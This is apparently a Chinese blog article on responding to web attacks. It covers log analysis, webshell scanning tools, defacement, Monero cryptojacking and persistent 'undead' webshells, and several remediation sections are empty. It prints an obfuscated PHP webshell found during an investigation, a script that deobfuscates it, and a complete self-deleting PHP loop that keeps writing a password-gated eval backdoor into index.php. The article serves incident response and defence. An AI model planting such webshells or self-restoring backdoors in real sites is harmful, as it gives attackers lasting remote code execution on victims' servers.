扫码领资料

获网安教程

# web攻击应急响应 ## 写在前面 随着 Web 技术不断发展，Web 被应用得越来越广泛，现在很多企业对外就一个网站来提供服务，所以网站的业务行为，安全性显得非常重要。当网页发生篡改、服务器...

文章来源: https://forum.butian.net/share/838文章作者：Honeypot如有侵权请您联系我们，我们会进行删除并致歉

web攻击应急响应

写在前面

web日志分析

单个文件分析

由于在单个文件中的日志现在已经非常少了，比较简单不展开介绍，只是举一个例子。在单个文件中还是比较好操作的，来看看吧，首先一看到gobuster这一关键词，用于目录收集的（在应急响应的时候可以整理自己的指纹库，指纹库就是一些常用的攻击工具的特征，这样可以让我们在应急响应时通过关键词快速发现一些问题，所以平时做一个有心人，多去整理一些资料）

多个文件分析

1、D盾_Web查杀
阿D出品，使用自行研发不分扩展名的代码分析引擎，能分析更为隐藏的 WebShell 后门行为。
兼容性：只提供 Windows 版本。
工具下载地址：http://www.d99net.net
2、百度 WEBDIR+
下一代 WebShell 检测引擎，采用先进的动态监测技术，结合多种引擎零规则查杀。
兼容性：提供在线查杀木马，免费开放 API 支持批量检测。
在线查杀地址：https://scanner.baidu.com
3、河马
专注 WebShell 查杀研究，拥有海量 WebShell 样本和自主查杀技术，采用传统特征+云端大数据双引擎的查杀技术。查杀速度快、精度高、误报低。
兼容性：支持 Windows、Linux，支持在线查杀。
官方网站：https://www.shellpub.com
4、Web Shell Detector
Web Shell Detector 具有 WebShell 签名数据库，可帮助识别高达 99％ 的 WebShell。
兼容性：提供 PHP、Python 脚本，可跨平台，在线检测。
官方网站：http://www.shelldetector.com
github项目地址：https://github.com/emposha/PHP-Shell-Detector
5、PHP Malware Finder
PHP-malware-finder 是一款优秀的检测webshell和恶意软件混淆代码的工具
兼容性：提供Linux 版本，Windows 暂不支持。
GitHub 项目地址：https://github.com/jvoisin/php-malware-finder
6、在线 WebShell 查杀工具
在线查杀地址：http://tools.bugscaner.com/killwebshell

<?php
$OOO0O0O00=__FILE__;$OOO000000=urldecode('%74%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64%66%70%6e%72');$OO00O0000=56;$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};$O0O0000O0='OOO0000O0';eval(($$O0O0000O0('JE9PME9PMDAwMD0kT09PMDAwMDAwezE3fS4kT09PMDAwMDAwezEyfS4kT09PMDAwMDAwezE4fS4kT09PMDAwMDAwezV9LiRPT08wMDAwMDB7MTl9O2lmKCEwKSRPMDAwTzBPMDA9JE9PME9PMDAwMCgkT09PME8wTzAwLCdyYicpOyRPTzBPTzAwME89JE9PTzAwMDAwMHsxN30uJE9PTzAwMDAwMHsyMH0uJE9PTzAwMDAwMHs1fS4kT09PMDAwMDAwezl9LiRPT08wMDAwMDB7MTZ9OyRPTzBPTzAwTzA9JE9PTzAwMDAwMHsxNH0uJE9PTzAwMDAwMHswfS4kT09PMDAwMDAwezIwfS4kT09PMDAwMDAwezB9LiRPT08wMDAwMDB7MjB9OyRPTzBPTzAwME8oJE8wMDBPME8wMCwxMjU5KTskT08wME8wME8wPSgkT09PMDAwME8wKCRPTzBPTzAwTzAoJE9PME9PMDAwTygkTzAwME8wTzAwLDM4MCksJ0VudGVyeW91d2toUkhZS05XT1VUQWFCYkNjRGRGZkdnSWlKakxsTW1QcFFxU3NWdlh4WnowMTIzNDU2Nzg5Ky89JywnQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVphYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5ejAxMjM0NTY3ODkrLycpKSk7ZXZhbCgkT08wME8wME8wKTs=')));return;?>
kr9NHenNHenNHe1zfukgFMaXdoyjcUImb19oUAxyb18mRtwmwJ4LT09NHr8XTzEXRJwmwJXPkr9NTzEXHenNHtILT08XT08XHr8XhtONTznNTzEXHr8Pkr8XHenNHr8XHtXLT08XHr8XHeEXhUXmOB50cbk5d3a3D2iUUylRTlfNaaOnCAkJW2YrcrcMO2fkDApQToxYdanXAbyTF1c2BuiDGjExHjH0YTC3KeLqRz0mRtfnWLYrOAcuUrlhU0xYTL9WAakTayaBa1icBMyJC2OlcMfPDBpqdo1Vd3nxFmY0fbc3Gul6HerZHzW1YjF4KUSvkZLphUL7cMYSd3YlhtONHeEXTznNHeEpK2a2CBXPkr9NHenNHenNHtL7wtOiNUEPwJrJbJkEwJLVk3Yzcbk0kzSLCUILb1nNA1OdDoyjD2aZbUL7

<?php 
/*********************************** 
*威盾PHP加密专家解密算法 By：Neeao 
*http://Neeao.com 
***********************************/ 

$filename="play-js.php";//要解密的文件 
$lines = file($filename);//0,1,2行 

//第一次base64解密 
$content=""; 
if(preg_match("/O0O0000O0('.*')/",$lines[1],$y)) 
{ 
    $content=str_replace("O0O0000O0('","",$y[0]); 
    $content=str_replace("')","",$content); 
    $content=base64_decode($content); 
} 
//第一次base64解密后的内容中查找密钥 
$decode_key=""; 
if(preg_match("/),'.*',/",$content,$k)) 
{ 
    $decode_key=str_replace("),'","",$k[0]); 
    $decode_key=str_replace("',","",$decode_key); 
} 
//查找要截取字符串长度 
$str_length=""; 
if(preg_match("/,d*),/",$content,$k)) 
{ 
    $str_length=str_replace("),","",$k[0]); 
    $str_length=str_replace(",","",$str_length); 
} 
//截取文件加密后的密文 
$Secret=substr($lines[2],$str_length); 
//echo $Secret; 
//直接还原密文输出 
echo "<?phpn".base64_decode(strtr($Secret,$decode_key,'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'))."?>"; 
?> 

放置本地服务器，访问时并没有看到东西，查看源代码就可以看到解密后的密码了，该马还使用了异或运算来进行免杀，对这次的分析还收获了很多，让我大致明白了日志分析的思路，同时也收获了一马。

1、熟悉web日志的格式，以及常用搭建环境下日志文件保存的位置（推荐使用everthing快速搜索文件）
2、关注攻击者攻击的时间
3、关注攻击者添加的内容
4、关注攻击者的ip
5、关注攻击者的操作顺序
6、学会多个文件进行对比分析
7、收集常用的web攻击攻击指纹库（很多工具都有特定的指纹如sqlmap，蚁剑等）
8、在没有思路的情况下，试着自己先尝试可不可以进行利用

批量挂黑页应急响应

解决办法

门罗币恶意挖矿应急响应

门罗币(Monero 或 XMR)，它是一个非常注重于隐私、匿名性和不可跟踪的加密数字货币。只需在网页中配置好js脚本，打开网页就可以挖矿，是一种非常简单的挖矿方式，而通过这种恶意挖矿获取数字货币是黑灰色产业获取收益的重要途径。这个操作往往不需要太高的系统权限，整个过程也非常容易操作
出现的特征
利用XMR恶意挖矿，浏览器进程占用了较大的CPU资源，严重影响了网站的用户体验。
分析
通过获取恶意网页url，对网页页面进行分析，发现网站页面被植入在线门罗币挖矿代码：

解决办法

不死马应急响应

<?php
    ignore_user_abort(true);//函数设置与客户机断开是否会终止脚本的执行。这里设置为true则忽略与用户的断开，即使与客户机断开脚本仍会执行
    set_time_limit(0);//函数设置脚本最大执行时间。这里设置为0，即没有时间方面的限制
    unlink(__FILE__);//删除文件本身，以起到隐蔽自身的作用
    $file = 'index.php';//写入的后门文件名
    $code='<?php if(md5($_GET["pass"])=="21232f297a57a5a743894a0e4a801fc3"){@eval($_POST[a];} ?>';//get提交的pass参数后面的值md5加密后是否与后面的值相等，可自行设置md5值
    while(1){//一直循环
        file_put_contents($file,$code);
        usleep(5000);//循环内每隔usleep(5000),写新的后门文件
    }
?>

解决办法

内存马攻击应急响应

解决办法

Beyond Compare工具的使用

总结

声明：⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤，任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的，否则后果⾃⾏承担。